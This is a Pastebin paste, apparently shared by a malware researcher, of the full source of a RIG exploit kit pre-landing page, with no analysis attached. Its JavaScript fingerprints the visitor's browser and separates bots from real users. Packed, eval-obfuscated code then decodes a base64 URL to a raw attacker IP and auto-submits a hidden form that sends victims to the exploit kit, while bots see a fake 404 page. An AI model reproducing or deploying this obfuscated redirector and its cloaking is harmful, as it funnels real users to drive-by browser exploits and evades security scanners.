Advertisement
MalwareBreakdown

RIG EK Pre-Landing Page

Mar 7th, 2018
15,632
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.53 KB | None | 0 0
  1.  
  2.  
  3. <!DOCTYPE html>
  4. <html lang="en">
  5. <head>
  6. <title></title>
  7. <meta charset="UTF-8">
  8. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  9. <meta name="apple-mobile-web-app-capable" content="yes">
  10. <meta name="apple-mobile-web-app-status-bar-style" content="black">
  11. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  12. </head>
  13. <body>
  14. <iframe onload="window.setTimeout('go()', 99)" src="about:blank"></iframe>
  15. <script>
  16.  
  17. var MaxiMus = '';
  18.  
  19. function getBrowser() {
  20. var ua = navigator.userAgent;
  21.  
  22. var browsrObj = {
  23. browser: 'unknown',
  24. browser_real: '',
  25. is_bot: false,
  26. browser_quality: 0,
  27. platform: 'desktop',
  28. versionFull: '',
  29. versionShort: ''
  30. };
  31.  
  32. try{
  33.  
  34. var bName = function () {
  35. if (ua.search(/Edge/) > -1) return "edge";
  36. if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
  37. if (ua.search(/Firefox/) > -1) return "firefox";
  38. if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
  39. if (ua.search(/YaBrowser/) > -1) return "yabrowser";
  40. if (ua.search(/Chrome/) > -1) return "chrome";
  41. if (ua.search(/Safari/) > -1) return "safari";
  42. if (ua.search(/Maxthon/) > -1) return "maxthon";
  43. else return "unknown";
  44. }();
  45.  
  46. browsrObj.browser = bName;
  47.  
  48. if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
  49.  
  50.  
  51. var version;
  52. if(bName != 'unknown')
  53. {
  54. switch (bName) {
  55. case "edge":
  56. version = (ua.split("Edge")[1]).split("/")[1];
  57. break;
  58. case "ie":
  59. if((ua.search(/Trident/) > -1))
  60. {
  61. version = (ua.split("; rv:")[1]).split(")")[0];
  62. }
  63. else
  64. {
  65. version = (ua.split("MSIE ")[1]).split(";")[0];
  66. }
  67. break;
  68. case "firefox":
  69. version = ua.split("Firefox/")[1];
  70. break;
  71. case "opera":
  72. version = ua.split("Version/")[1];
  73. break;
  74. case "operaWebkit":
  75. bName = "opera";
  76. version = ua.split("OPR/")[1];
  77. break;
  78. case "yabrowser":
  79. version = (ua.split("YaBrowser/")[1]).split(" ")[0];
  80. break;
  81. case "chrome":
  82. version = (ua.split("Chrome/")[1]).split(" ")[0];
  83. break;
  84. case "safari":
  85. version = (ua.split("Version/")[1]).split(" ")[0];
  86. break;
  87. case "maxthon":
  88. version = ua.split("Maxthon/")[1];
  89. break;
  90.  
  91. }
  92.  
  93. browsrObj.versionFull = version;
  94. browsrObj.versionShort = version.split(".")[0];
  95. }
  96.  
  97. } catch (err) {}
  98.  
  99.  
  100. var w=window,d=document;
  101. var CorrectBrowser = true;
  102. var uaBrowser = browsrObj;
  103. var isIE = isChrome = isFirefox = isOpera = 0;
  104.  
  105. if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
  106. {
  107. if('ActiveXObject' in window) isIE++;
  108. if('chrome' in window) isChrome++;
  109. if('opera' in window) isOpera++;
  110.  
  111. if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
  112.  
  113. if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
  114.  
  115.  
  116. var f=0;
  117. f|='sandbox' in d.createElement('iframe')?1:0;
  118. f|='WebSocket' in w?2:0;
  119. f|=w.Worker?4:0;
  120. f|=w.applicationCache?8:0;
  121. f|=w.history && history.pushState?16:0;
  122. f|=d.documentElement.webkitRequestFullScreen?32:0;
  123. f|='FileReader' in w?64:0;
  124.  
  125.  
  126. if(f==0) isIE++;
  127.  
  128. if(isIE > 0)
  129. {
  130. browsrObj.browser_real = 'ie';
  131. browsrObj.browser_quality = isIE;
  132. }
  133. if(isChrome > 1 && isFirefox == 0)
  134. {
  135. browsrObj.browser_real = 'chrome';
  136. browsrObj.browser_quality = isChrome;
  137. }
  138. if(isFirefox > 0 && isChrome == 0)
  139. {
  140. browsrObj.browser_real = 'firefox';
  141. browsrObj.browser_quality = isFirefox;
  142. }
  143.  
  144. if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
  145. }
  146.  
  147. MaxiMus += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
  148.  
  149. return browsrObj;
  150. }
  151.  
  152. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('8 c="L"+"K"+"M"+"V+/"+"=";s G(1){8 5="";8 e,j,k="";8 f,b,7,a="";8 i=0;8 B=/[^A-E-F-9\\+\\/\\=]/g;d(B.S(1)){}1=1.P(/[^A-E-F-9\\+\\/\\=]/g,"");Q{f=c.l(1.h(i++));b=c.l(1.h(i++));7=c.l(1.h(i++));a=c.l(1.h(i++));e=(f<<2)|(b>>4);j=((b&15)<<4)|(7>>2);k=((7&3)<<6)|a;5=5+m.n(e);d(7!=y){5=5+m.n(j)}d(a!=y){5=5+m.n(k)}e=j=k="";f=b=7=a=""}R(i<1.U);O J(5)}s N(){r=T();d(r.10==W){q.1h(\'<I><u><t>1g x w</t></u><o><v>x w</v><p>1e 1f 1j 1k 1q 1p 1o 1l 1m.</p><1d><H>1c/2.2.12 (13) 14 1a 1b</H></o></I>\')}16{D.C[0].q.o.17=\'<z 18="19" Y="X" Z="\'+G(\'11=\')+\'"></z>\';D.C[0].q.1n[0].1i()}}',62,89,'|input||||output||enc3|var||enc4|enc2|keyStr|if|chr1|enc1||charAt||chr2|chr3|indexOf|String|fromCharCode|body||document|BrowserInfo|function|title|head|h1|Found|Not|64|form||base64test|frames|window|Za|z0|decode64|address|html|unescape|QRSTUVWXYZabcdef|ABCDEFGHIJKLMNOP|ghijklmnopqrstuv|go|return|replace|do|while|exec|getBrowser|length|wxyz0123456789|true|post|method|action|is_bot|aHR0cDovLzE3Ni41Ny4yMjAuMTM3Lz9OVFF5TlRJMiZFeHpOSHRZJk9Ka09wcFQ9Ykc5allYUmxaQT09JldjaG9FdEY9Ykc5allYUmxaQT09JkpuR29qUVhBPWJXbHNhdz09JnRoZHMzNGQ9bTNZOV9jc0t1UUZOUWZqamhTQWNnSmxuZDllV2drVXBhQ3UzMExTbWhlWWdjV0YteDJNVVRwMXU5Q1dVYkkmbng0MjJDcz13WHJRTXZYY0p3RFFESWJHTXZyRVNMdEROa25RQTBLSzJJMzJfZHF5RW9IOWZXbmloTnpVU2tyMTZCMmFDJnBFcWNlRVhYV2RlPWNtVndiM0owJnBjYUZmZWtjY2g9WTJGd2FYUmhiQT09JmpUbHNJd3M9Ykc5allYUmxaQT09JmFyQmxyUFBEemNqT2xhTT1ZMjl1YzJsa1pYST0|22|Debian|Server||else|innerHTML|target|_parent|Port|80|Apache|hr|The|requested|404|write|submit|URL|was|this|server|forms|on|found|not'.split('|'),0,{}))
  153.  
  154. </script>
  155.  
  156. </body>
  157. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement